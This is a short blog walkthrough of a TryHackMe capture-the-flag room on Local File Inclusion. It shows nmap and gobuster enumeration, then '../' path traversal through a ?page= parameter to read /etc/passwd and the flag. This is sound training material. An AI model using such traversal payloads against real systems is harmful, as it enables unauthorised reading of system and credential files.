Challenges: Lo-Fi (TryHackMe)
JebitokTable of contents
This challenge focuses on Local File Inclusion (LFI), a vulnerability where an application includes files based on user input without proper validation. In practice, this allows attackers to read sensitive files or even achieve code execution. The goal here was to explore a web application, identify a vulnerable parameter, and use it to climb the filesystem and retrieve the flag.
Want to hear some lo-fi beats, to relax or study to? We've got you covered!
Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.
Navigate to the following URL using the AttackBox: http://MACHINE_IP and find the flag in the root of the filesystem.
Check out similar content on TryHackMe:
Note: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.
Answer the questions below
Climb the filesystem to find the flag!
At first, I scanned with nmap used gobuster to enumerate the directories
nmap -sV IP_Address
gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt
Visited the site: http://IP_Address and it has a ?page= parameter, which was hinted at in the file inclusion
Next, I tested this path: /?page=../../../../etc/passwd And this confirmed LFI.
At first, I tried to check the path at http://IP_Address/?page=../../../../root/flag.txt But there was a hint in the description:
“Find the flag in the root of the filesystem.”
http://IP_Address/?page=../../../../flag.txt revealed the flag
This room teaches that when exploiting LFI, understanding the directory structure and reading task hints is key. Instead of blindly guessing (/root/flag.txt), reading and testing paths systematically saves time. In real-world scenarios, LFI can escalate to Remote Code Execution (RCE) or credential theft if write access or log poisoning is possible, making it a high-severity vulnerability.
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.